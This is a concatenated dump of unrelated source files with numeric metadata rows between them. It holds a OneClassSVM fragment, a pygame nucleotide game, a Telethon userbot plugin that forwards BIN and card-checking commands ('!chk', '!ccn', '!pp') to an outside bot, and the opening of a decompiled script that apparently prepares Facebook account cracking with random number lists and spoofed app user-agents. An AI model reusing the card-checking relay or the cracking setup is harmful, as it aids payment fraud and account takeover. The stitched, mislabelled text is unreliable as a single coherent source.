# init
alpha = np.ones(l)
n = int(self.nu * l)
for i in range(n):
alpha[i] = 1
if n < l:
alpha[i] = self.nu * l - n
for i in range(n + 1, l):
alpha[i] = 0
if self.cache_size == 0:
Q = kernel_func(X, X)
solver = Solver(Q, p, y, 1, self.tol)
solver.alpha = alpha
solver.neg_y_grad = -y * np.matmul(Q, solver.alpha)
else:
solver = SolverWithCache(p, y, 1, self.tol, self.cache_size)
solver.alpha = alpha
for i in range(l):
solver.neg_y_grad[i] -= y[i] * np.matmul(func(i), solver.alpha)
for n_iter in range(self.max_iter):
i, j = solver.working_set_select()
if i < 0:
break
solver.update(i, j, func)
else:
print("OneClassSVM not coverage with {} iterations".format(
self.max_iter))
rho = solver.calculate_rho()
self.decision_function = lambda x: np.matmul(
solver.alpha,
kernel_func(X, x),
) - rho
return self
def predict(self, X: np.ndarray):
'''判别数据是否异常,正常为1,异常为-1'''
pred = np.sign(self.decision_function(X))
pred[pred == 0] = -1
return pred
def score(self, X, y):
'''无监督问题不存在评估函数,因此调用该函数会引发异常'''
raise NotImplementedError
| 31.321238
| 216
| 0.511858
| 3,687
| 29,348
| 3.97559
| 0.074586
| 0.035612
| 0.025242
| 0.031519
| 0.849434
| 0.833129
| 0.819075
| 0.802906
| 0.784145
| 0.771115
| 0
| 0.032403
| 0.341727
| 29,348
| 936
| 217
| 31.354701
| 0.726332
| 0.300395
| 0
| 0.738431
| 0
| 0
| 0.022938
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.104628
| false
| 0
| 0.012072
| 0.042254
| 0.219316
| 0.014085
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
3b5d1255f3db95024131da5f5742cbae6d2fb11a
| 78
|
py
|
Python
|
python/stitch/frameworks/tune/__init__.py
|
theNewFlesh/sparse
|
21e895d2e24cc17e92fe921534059046080cc58b
|
[
"MIT"
] | 2
|
2020-04-17T04:26:23.000Z
|
2021-12-27T17:24:08.000Z
|
python/stitch/frameworks/tune/__init__.py
|
theNewFlesh/stitch
|
21e895d2e24cc17e92fe921534059046080cc58b
|
[
"MIT"
] | null | null | null |
python/stitch/frameworks/tune/__init__.py
|
theNewFlesh/stitch
|
21e895d2e24cc17e92fe921534059046080cc58b
|
[
"MIT"
] | null | null | null |
import stitch.frameworks.tune.tuner
import stitch.frameworks.tune.config_path
| 26
| 41
| 0.871795
| 11
| 78
| 6.090909
| 0.636364
| 0.358209
| 0.656716
| 0.776119
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.051282
| 78
| 2
| 42
| 39
| 0.905405
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
3b79b586c3e357dfed9bc7ec561f04de9e569586
| 4,454
|
py
|
Python
|
ATH/nucleicAcid.py
|
james-darpino/Game_Design1
|
7b07c27b976a8193561d38d7da17e583a166e0c0
|
[
"MIT"
] | null | null | null |
ATH/nucleicAcid.py
|
james-darpino/Game_Design1
|
7b07c27b976a8193561d38d7da17e583a166e0c0
|
[
"MIT"
] | null | null | null |
ATH/nucleicAcid.py
|
james-darpino/Game_Design1
|
7b07c27b976a8193561d38d7da17e583a166e0c0
|
[
"MIT"
] | null | null | null |
import pygame
import random
import Globals
class Adenine(pygame.sprite.Sprite):
""" This class represents an Adenine which the player must collect. """
def __init__(self):
""" Constructor, create the image of the Adenine. """
super().__init__()
self.image = pygame.Surface([Globals.ION_WIDTH, Globals.ION_HEIGHT])
self.rect = self.image.get_rect()
self.image = pygame.image.load("adenine.png").convert_alpha()
self.image = pygame.transform.scale(self.image, (Globals.ION_WIDTH, Globals.ION_HEIGHT))
def draw(self, screen):
""" Maps the image to the rectangle. """
screen.blit(self.image, self.rect)
def reset_pos(self):
""" Shows the range and boundaries of where the ion should be placed. """
self.rect.y = random.randrange(-300, -20)
self.rect.x = random.uniform(Globals.HELIX_LEFT_BOUNDARY, Globals.HELIX_RIGHT_BOUNDARY)
def update(self):
""" Automatically called when we need to move the ion. """
self.rect.y += 5
if self.rect.y > Globals.SCREEN_HEIGHT + self.rect.height:
self.reset_pos()
class Cytosine(pygame.sprite.Sprite):
""" This class represents an Adenine which the player must collect. """
def __init__(self):
""" Constructor, create the image of the Adenine. """
super().__init__()
self.image = pygame.Surface([Globals.ION_WIDTH, Globals.ION_HEIGHT])
self.rect = self.image.get_rect()
self.image = pygame.image.load("cytosine.png").convert_alpha()
self.image = pygame.transform.scale(self.image, (Globals.ION_WIDTH, Globals.ION_HEIGHT))
def draw(self, screen):
""" Maps the image to the rectangle. """
screen.blit(self.image, self.rect)
def reset_pos(self):
""" Shows the range and boundaries of where the ion should be placed. """
self.rect.y = random.randrange(-300, -20)
self.rect.x = random.uniform(Globals.HELIX_LEFT_BOUNDARY, Globals.HELIX_RIGHT_BOUNDARY)
def update(self):
""" Automatically called when we need to move the ion. """
self.rect.y += 5
if self.rect.y > Globals.SCREEN_HEIGHT + self.rect.height:
self.reset_pos()
class Guanine(pygame.sprite.Sprite):
""" This class represents an Adenine which the player must collect. """
def __init__(self):
""" Constructor, create the image of the Adenine. """
super().__init__()
self.image = pygame.Surface([Globals.ION_WIDTH, Globals.ION_HEIGHT])
self.rect = self.image.get_rect()
self.image = pygame.image.load("Guanine.png").convert_alpha()
self.image = pygame.transform.scale(self.image, (Globals.ION_WIDTH, Globals.ION_HEIGHT))
def draw(self, screen):
""" Maps the image to the rectangle. """
screen.blit(self.image, self.rect)
def reset_pos(self):
""" Shows the range and boundaries of where the ion should be placed. """
self.rect.y = random.randrange(-300, -20)
self.rect.x = random.uniform(Globals.HELIX_LEFT_BOUNDARY, Globals.HELIX_RIGHT_BOUNDARY)
def update(self):
""" Automatically called when we need to move the ion. """
self.rect.y += 5
if self.rect.y > Globals.SCREEN_HEIGHT + self.rect.height:
self.reset_pos()
class Thymine(pygame.sprite.Sprite):
""" This class represents an Adenine which the player must collect. """
def __init__(self):
""" Constructor, create the image of the Adenine. """
super().__init__()
self.image = pygame.Surface([Globals.ION_WIDTH, Globals.ION_HEIGHT])
self.rect = self.image.get_rect()
self.image = pygame.image.load("thymine.png").convert_alpha()
self.image = pygame.transform.scale(self.image, (Globals.ION_WIDTH, Globals.ION_HEIGHT))
def draw(self, screen):
""" Maps the image to the rectangle. """
screen.blit(self.image, self.rect)
def reset_pos(self):
""" Shows the range and boundaries of where the ion should be placed. """
self.rect.y = random.randrange(-300, -20)
self.rect.x = random.uniform(Globals.HELIX_LEFT_BOUNDARY, Globals.HELIX_RIGHT_BOUNDARY)
def update(self):
""" Automatically called when we need to move the ion. """
self.rect.y += 5
if self.rect.y > Globals.SCREEN_HEIGHT + self.rect.height:
self.reset_pos()
| 38.068376
| 96
| 0.647283
| 590
| 4,454
| 4.744068
| 0.123729
| 0.080029
| 0.064309
| 0.06288
| 0.964273
| 0.964273
| 0.964273
| 0.964273
| 0.964273
| 0.964273
| 0
| 0.006979
| 0.227885
| 4,454
| 116
| 97
| 38.396552
| 0.806921
| 0.237539
| 0
| 0.835821
| 0
| 0
| 0.013749
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.238806
| false
| 0
| 0.044776
| 0
| 0.343284
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
8e9758dab0b96fe58f164d814a58e08e4cd51b66
| 8,442
|
py
|
Python
|
userbot/plugins/binchecker.py
|
karmaboii/Karmabot
|
f7007daee7d7dfb57ecc9ae26dd09f75c7aaf3b5
|
[
"MIT"
] | null | null | null |
userbot/plugins/binchecker.py
|
karmaboii/Karmabot
|
f7007daee7d7dfb57ecc9ae26dd09f75c7aaf3b5
|
[
"MIT"
] | null | null | null |
userbot/plugins/binchecker.py
|
karmaboii/Karmabot
|
f7007daee7d7dfb57ecc9ae26dd09f75c7aaf3b5
|
[
"MIT"
] | null | null | null |
# © KarmaBot
# Created by @Karmaboii
import datetime
import asyncio
from telethon import events
from telethon.errors.rpcerrorlist import YouBlockedUserError, UserAlreadyParticipantError
from telethon.tl.functions.account import UpdateNotifySettingsRequest
from telethon.tl.functions.messages import ImportChatInviteRequest
from userbot.utils import admin_cmd
import time
from userbot import ALIVE_NAME
naam = str(ALIVE_NAME)
bot = "@uNiqueko_bot"
@borg.on(admin_cmd("bin ?(.*)"))
async def _(event):
if event.fwd_from:
return
sysarg = event.pattern_match.group(1)
if sysarg == "":
async with borg.conversation(bot) as conv:
try:
await conv.send_message("/start")
response = await conv.get_response()
await conv.send_message("!bin")
audio = await conv.get_response()
final = ("If you get any problem Contact to Creator of this plugin @Karmaboii")
await borg.send_message(event.chat_id, audio.text)
await event.delete()
except YouBlockedUserError:
await event.edit("**Error:** `unblock` @KarmaHacx_bot `and retry!")
elif "" in sysarg:
async with borg.conversation(bot) as conv:
try:
await conv.send_message("/start")
response = await conv.get_response()
await conv.send_message("!bin " + sysarg)
audio = await conv.get_response()
final = ("If you get any problem Contact to Creator of this plugin @Karmaboii")
await borg.send_message(event.chat_id, audio.text)
await event.delete()
except YouBlockedUserError:
await event.edit("**Error:** `unblock` @KarmaHacx_bot `and retry!")
@borg.on(admin_cmd("chk ?(.*)"))
async def _(event):
if event.fwd_from:
return
sysarg = event.pattern_match.group(1)
if sysarg == "":
async with borg.conversation(bot) as conv:
try:
await conv.send_message("/start")
response = await conv.get_response()
await conv.send_message("!chk")
audio = await conv.get_response()
final = ("If you get any problem Contact to Creator of this plugin @Karmaboii")
await borg.send_message(event.chat_id, audio.text)
await event.delete()
except YouBlockedUserError:
await event.edit("**Error:** `unblock` @KarmaHacx_bot `and retry!")
elif "" in sysarg:
async with borg.conversation(bot) as conv:
try:
await conv.send_message("/start")
response = await conv.get_response()
await conv.send_message("!chk " + sysarg)
audio = await conv.get_response()
final = ("If you get any problem Contact to Creator of this plugin @Karmaboii")
await borg.send_message(event.chat_id, audio.text)
await event.delete()
except YouBlockedUserError:
await event.edit("**Error:** `unblock` @KarmaHacx_bot `and retry!")
@borg.on(admin_cmd("pp ?(.*)"))
async def _(event):
if event.fwd_from:
return
sysarg = event.pattern_match.group(1)
if sysarg == "":
async with borg.conversation(bot) as conv:
try:
await conv.send_message("/start")
response = await conv.get_response()
await conv.send_message("!pp")
audio = await conv.get_response()
final = ("If you get any problem Contact to Creator of this plugin @Karmaboii")
await borg.send_message(event.chat_id, audio.text)
await event.delete()
except YouBlockedUserError:
await event.edit("**Error:** `unblock` @KarmaHacx_bot `and retry!")
elif "" in sysarg:
async with borg.conversation(bot) as conv:
try:
await conv.send_message("/start")
response = await conv.get_response()
await conv.send_message("!pp " + sysarg)
audio = await conv.get_response()
final = ("If you get any problem Contact to Creator of this plugin @Karmaboii")
await borg.send_message(event.chat_id, audio.text)
await event.delete()
except YouBlockedUserError:
await event.edit("**Error:** `unblock` @KarmaHacx_bot `and retry!")
@borg.on(admin_cmd("ccn ?(.*)"))
async def _(event):
if event.fwd_from:
return
sysarg = event.pattern_match.group(1)
if sysarg == "":
async with borg.conversation(bot) as conv:
try:
await conv.send_message("/start")
response = await conv.get_response()
await conv.send_message("!ccn")
audio = await conv.get_response()
final = ("If you get any problem Contact to Creator of this plugin @Karmaboii")
await borg.send_message(event.chat_id, audio.text)
await event.delete()
except YouBlockedUserError:
await event.edit("**Error:** `unblock` @KarmaHacx_bot `and retry!")
elif "" in sysarg:
async with borg.conversation(bot) as conv:
try:
await conv.send_message("/start")
response = await conv.get_response()
await conv.send_message("!ccn " + sysarg)
audio = await conv.get_response()
final = ("If you get any problem Contact to Creator of this plugin @Karmaboii")
await borg.send_message(event.chat_id, audio.text)
await event.delete()
except YouBlockedUserError:
await event.edit("**Error:** `unblock` @KarmaHacx_bot `and retry!")
@borg.on(admin_cmd("csk ?(.*)"))
async def _(event):
if event.fwd_from:
return
sysarg = event.pattern_match.group(1)
if sysarg == "":
async with borg.conversation(bot) as conv:
try:
await conv.send_message("/start")
response = await conv.get_response()
await conv.send_message("!csk")
audio = await conv.get_response()
final = ("If you get any problem Contact to Creator of this plugin @Karmaboii")
await borg.send_message(event.chat_id, audio.text)
await event.delete()
except YouBlockedUserError:
await event.edit("**Error:** `unblock` @KarmaHacx_bot `and retry!")
elif "" in sysarg:
async with borg.conversation(bot) as conv:
try:
await conv.send_message("/start")
response = await conv.get_response()
await conv.send_message("!csk " + sysarg)
audio = await conv.get_response()
final = ("If you get any problem Contact to Creator of this plugin @Karmaboii")
await borg.send_message(event.chat_id, audio.text)
await event.delete()
except YouBlockedUserError:
await event.edit("**Error:** `unblock` @KarmaHacx_bot `and retry!")
@borg.on(admin_cmd("cid ?(.*)"))
async def _(event):
if event.fwd_from:
return
sysarg = event.pattern_match.group(1)
if sysarg == "":
async with borg.conversation(bot) as conv:
try:
await conv.send_message("/start")
response = await conv.get_response()
await conv.send_message("!cid")
audio = await conv.get_response()
final = ("If you get any problem Contact to Creator of this plugin @Karmaboii")
await borg.send_message(event.chat_id, audio.text)
await event.delete()
except YouBlockedUserError:
await event.edit("**Error:** `unblock` @KarmaHacx_bot `and retry!")
elif "" in sysarg:
async with borg.conversation(bot) as conv:
try:
await conv.send_message("/start")
response = await conv.get_response()
await conv.send_message("!cid " + sysarg)
audio = await conv.get_response()
final = ("If you get any problem Contact to Creator of this plugin @Karmaboii")
await borg.send_message(event.chat_id, audio.text)
await event.delete()
except YouBlockedUserError:
await event.edit("**Error:** `unblock` @KarmaHacx_bot `and retry!")
| 42.636364
| 95
| 0.59429
| 972
| 8,442
| 5.047325
| 0.088477
| 0.088055
| 0.063596
| 0.097839
| 0.916429
| 0.916429
| 0.916429
| 0.916429
| 0.916429
| 0.916429
| 0
| 0.001017
| 0.300877
| 8,442
| 197
| 96
| 42.852792
| 0.830058
| 0.003791
| 0
| 0.843243
| 0
| 0
| 0.185322
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.048649
| 0
| 0.081081
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8edccc557fbaa4ed787958477c2924c39a0369b2
| 14,222
|
py
|
Python
|
Indo/indo_dec.py
|
shyamjangid07/Reverse-Engineering
|
469efabcd6057f7895d8d891f1fabdf2ffe730b0
|
[
"Apache-2.0"
] | 337
|
2020-08-15T12:22:14.000Z
|
2022-03-29T06:05:15.000Z
|
Indo/indo_dec.py
|
ajairakaam/Reverse-Engineering
|
49d00bafd0622ffb79e081946a19c5fd3a42628f
|
[
"Apache-2.0"
] | 3
|
2020-11-12T14:30:48.000Z
|
2021-05-18T16:56:22.000Z
|
Indo/indo_dec.py
|
ajairakaam/Reverse-Engineering
|
49d00bafd0622ffb79e081946a19c5fd3a42628f
|
[
"Apache-2.0"
] | 83
|
2020-08-15T00:22:58.000Z
|
2022-03-31T08:40:23.000Z
|
# Decompiled by HTR-TECH | TAHMID RAYAT
# Github : https://github.com/htr-tech
#---------------------------------------
# Auto Dis Parser 2.2.0
# Source File : indo_1.pyc
# Bytecode Version : 2.7
# Embedded file name: <tegarid>
# Time : Sun Aug 9 11:45:04 2020
#---------------------------------------
import os, sys, time, datetime, random, hashlib, re, threading, json, urllib, cookielib, getpass
os.system('rm -rf .txt')
for n in range(10000):
nmbr = random.randint(1111111, 9999999)
sys.stdout = open('.txt', 'a')
print nmbr
sys.stdout.flush()
try:
import requests
except ImportError:
os.system('pip2 install mechanize')
try:
import mechanize
except ImportError:
os.system('pip2 install request')
time.sleep(1)
os.system('Then type: python2 boss')
import os, sys, time, datetime, random, hashlib, re, threading, json, urllib, cookielib, requests, mechanize
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from mechanize import Browser
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16')]
br.addheaders = [('user-agent', 'Dalvik/1.6.0 (Linux; U; Android 4.4.2; NX55 Build/KOT5506) [FBAN/FB4A;FBAV/106.0.0.26.68;FBBV/45904160;FBDM/{density=3.0,width=1080,height=1920};FBLC/it_IT;FBRV/45904160;FBCR/PosteMobile;FBMF/asus;FBBD/asus;FBPN/com.facebook.katana;FBDV/ASUS_Z00AD;FBSV/5.0;FBOP/1;FBCA/x86:armeabi-v7a;]')]
def keluar():
print 'Thanks.'
os.sys.exit()
def acak(b):
w = 'ahtdzjc'
d = ''
for i in x:
d += '!' + w[random.randint(0, len(w) - 1)] + i
return cetak(d)
def cetak(b):
w = 'ahtdzjc'
for i in w:
j = w.index(i)
x = x.replace('!%s' % i, '\x1b[%s;1m' % str(31 + j))
x += '\x1b[0m'
x = x.replace('!0', '\x1b[0m')
sys.stdout.write(x + '\n')
def jalan(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(0.001)
def tik():
titik = [
'. ', '.. ', '... ']
for o in titik:
print '\r\x1b[1;93mPlease Wait \x1b[1;93m' + o,
sys.stdout.flush()
time.sleep(1)
logo = '\xe2\x96\x91\xe2\x96\x90\xe2\x96\x88\xe2\x96\x80\xe2\x96\x88\xe2\x96\x92\xe2\x96\x90\xe2\x96\x88\xe2\x96\x80\xe2\x96\x80\xe2\x96\x84\xe2\x96\x91\xe2\x96\x91\xe2\x96\x84\xe2\x96\x88\xe2\x96\x80\xe2\x96\x84\xe2\x94\x80\xe2\x96\x91\xe2\x96\x90\xe2\x96\x88\xe2\x96\x80\xe2\x96\x88\xe2\x96\x92\xe2\x96\x90\xe2\x96\x88\xe2\x96\x92\xe2\x96\x90\xe2\x96\x80\xe2\x96\x90\xe2\x96\x88\xe2\x96\x88\xe2\x96\x92\xe2\x96\x88\xe2\x96\x88\xe2\x96\x84\xe2\x96\x91\xe2\x96\x92\xe2\x96\x88\xe2\x96\x8c\xe2\x96\x91\xe2\x96\x90\xe2\x96\x88\xe2\x96\x80\xe2\x96\x88\xe2\x96\x84\xe2\x96\x92\xe2\x96\x90\xe2\x96\x88\xe2\x96\x80\xe2\x96\x80\xe2\x96\x88\xe2\x96\x8c\n\xe2\x96\x91\xe2\x96\x90\xe2\x96\x88\xe2\x94\x80\xe2\x94\x80\xe2\x96\x92\xe2\x96\x90\xe2\x96\x88\xe2\x96\x92\xe2\x96\x90\xe2\x96\x88\xe2\x96\x91\xe2\x96\x90\xe2\x96\x88\xe2\x96\x84\xe2\x96\x84\xe2\x96\x90\xe2\x96\x88\xe2\x96\x91\xe2\x96\x90\xe2\x96\x88\xe2\x94\x80\xe2\x94\x80\xe2\x96\x92\xe2\x96\x90\xe2\x96\x88\xe2\x96\x88\xe2\x96\x8c\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x8c\xe2\x96\x92\xe2\x96\x90\xe2\x96\x88\xe2\x96\x92\xe2\x96\x88\xe2\x96\x92\xe2\x96\x88\xe2\x96\x91\xe2\x96\x91\xe2\x96\x90\xe2\x96\x88\xe2\x96\x8c\xe2\x96\x90\xe2\x96\x88\xe2\x96\x92\xe2\x96\x90\xe2\x96\x88\xe2\x96\x84\xe2\x96\x92\xe2\x96\x88\xe2\x96\x8c\n\xe2\x96\x91\xe2\x96\x90\xe2\x96\x88\xe2\x96\x84\xe2\x96\x88\xe2\x96\x92\xe2\x96\x90\xe2\x96\x88\xe2\x96\x80\xe2\x96\x84\xe2\x96\x84\xe2\x96\x91\xe2\x96\x90\xe2\x96\x88\xe2\x94\x80\xe2\x96\x91\xe2\x96\x90\xe2\x96\x88\xe2\x96\x91\xe2\x96\x90\xe2\x96\x88\xe2\x96\x84\xe2\x96\x88\xe2\x96\x92\xe2\x96\x90\xe2\x96\x88\xe2\x96\x92\xe2\x96\x90\xe2\x96\x84\xe2\x96\x90\xe2\x96\x88\xe2\x96\x88\xe2\x96\x92\xe2\x96\x88\xe2\x96\x88\xe2\x96\x91\xe2\x96\x92\xe2\x96\x88\xe2\x96\x88\xe2\x96\x8c\xe2\x96\x91\xe2\x96\x90\xe2\x96\x88\xe2\x96\x84\xe2\x96\x88\xe2\x96\x80\xe2\x96\x92\xe2\x96\x90\xe2\x96\x88\xe2\x96\x88\xe2\x96\x84\xe2\x96\x88\xe2\x96\x8c\n\n Author : Tegar ID\n Youtube : Dunia Kode\n\n DUNIA KODE COMUNITY\n\n'
back = 0
oks = []
id = []
cpb = []
vulnot = '\x1b[31mNot Vuln'
vuln = '\x1b[32mVuln'
os.system('clear')
jalan('\x1b[3;45;91mCoding Is Fun, I Always Happy With Code \x1b[1;0m')
jalan(' \x1b[1;96m HALLO WELCOME TO TOOLS DUNIA KODE \x1b[1;0m')
jalan('=====================================')
jalan('\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92')
jalan('\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92')
jalan('\xe2\x96\x92\xe2\x96\x92\xe2\x96\x88\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x84\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x84\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92')
jalan('\xe2\x96\x92\xe2\x96\x88\xe2\x96\x90\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92')
jalan('\xe2\x96\x92\xe2\x96\x8c\xe2\x96\x90\xe2\x96\x92\xe2\x96\x92\xe2\x96\x88\xe2\x96\x88\xe2\x96\x84\xe2\x96\x80\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x80\xe2\x96\x84\xe2\x96\x88\xe2\x96\x88\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92')
jalan('\xe2\x96\x90\xe2\x94\xbc\xe2\x96\x90\xe2\x96\x92\xe2\x96\x92\xe2\x96\x88\xe2\x96\x88\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x88\xe2\x96\x88\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x88\xe2\x96\x88\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92')
jalan('\xe2\x96\x90\xe2\x94\xbc\xe2\x96\x90\xe2\x96\x92\xe2\x96\x92\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92')
jalan('\xe2\x96\x90\xe2\x96\x84\xe2\x96\x90\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x94\x80\xe2\x96\x80\xe2\x96\x90\xe2\x96\x90\xe2\x96\x80\xe2\x96\x88\xe2\x94\x80\xe2\x96\x88\xe2\x94\x80\xe2\x96\x8c\xe2\x96\x90\xe2\x96\x88\xe2\x96\x88\xe2\x96\x84\xe2\x96\x92')
jalan('\xe2\x96\x92\xe2\x96\x92\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x96\x90\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x8c')
jalan('\xe2\x96\x92\xe2\x96\x92\xe2\x96\x88\xe2\x96\x80\xe2\x96\x80\xe2\x96\x88\xe2\x96\x88\xe2\x96\x84\xe2\x96\x88\xe2\x94\x80\xe2\x96\x84\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x96\x90\xe2\x94\x80\xe2\x96\x84\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x80\xe2\x96\x92')
jalan('\xe2\x96\x92\xe2\x96\x92\xe2\x96\x88\xe2\x96\x92\xe2\x96\x92\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x84\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92')
jalan('\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92')
jalan('\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92')
jalan('\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x90\xe2\x96\x8c\xe2\x96\x88\xe2\x96\x88\xe2\x96\x8c\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92')
jalan('\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x90\xe2\x96\x80\xe2\x96\x90\xe2\x96\x92\xe2\x96\x8c\xe2\x96\x80\xe2\x96\x88\xe2\x96\x80\xe2\x96\x92\xe2\x96\x90\xe2\x96\x92\xe2\x96\x88\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92')
jalan('\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x90\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x8c\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92')
jalan('\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92')
